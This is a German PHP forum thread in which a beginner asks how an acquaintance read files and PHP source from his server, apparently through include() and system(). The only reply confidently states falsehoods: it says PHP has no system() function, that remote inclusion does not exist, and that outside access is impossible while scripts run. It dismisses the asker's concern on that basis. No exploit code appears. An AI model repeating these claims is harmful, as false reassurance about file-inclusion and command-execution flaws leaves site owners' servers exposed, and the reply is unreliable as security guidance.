system(), include und linux: keinen plan

Einklappen
X
 
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

  • system(), include und linux: keinen plan

    Hallöchen Leute,
    ich bin ja ein ziemlicher anfänger in sachen PHP, in sachen Linux und Serverdinge habe ich noch überhaupt keine ahnung!

    Mir hat eben ein Bekannter teile von meinem Script präsentiert, die er von meinem Server hatte!!!

    Er meinte mein Script währe lausig programmiert (was wohl auch stimmt ) und deswegen konnte er das irgendwie rausbekommen!

    Er faselte die ganze zeit irgendwas von include, lokalem includen und externem, hat gesagt man muss sich da mit linux auskennen und mit dem system() befehl hätte das ganze auch noch zutun.

    Er wollte es mir aber nicht erklären, hat sich nur darüber lustig gemacht was für ein schlechter anfänger ich bin .

    Versteht das jetzt hier einer und kann mir erklären wie er nicht nur Dateien von meinem Server auspüren konnte, sondern auch noch den PHP code in die hände bekam?

    Kann mir einer sagen was für einen Fehler ich in meinem Script gemacht habe (es muss irgendwas mit include() zu tun haben) und wie ich das in zukunft verhindern kann?

    Danke im Vorraus,
    Gruß,
    Bigzed.

  • #2
    Es gibt keine system() Befehl...weder in Linux noch in PHP.

    Das könnte viele Ursachen haben aber mit Linux hat das 100%ig nix zu tun. Linux ist nicht der Webserver. Wenn dann hast du schlechte Zugriffsrechte in deinen Webordnern gesetzt, oder du hast nen FTP-Server laufen und kein richtiges Passwort.

    Aber solange deine Scripte laufen (und in <?php ?> stehn) kann man von aussen nicht drankommen...
    Auf jeden Fall hat dein Bekannter keinen Plan von Linux und versucht dich aufn Arm zu nehmen
    Übrigens gibts keinen extrenen include() Befehl

    extern is von ausserhalb und man kann kein PHP Script von ausserhalb einbinden, egal was dieser Kerl auch erzählt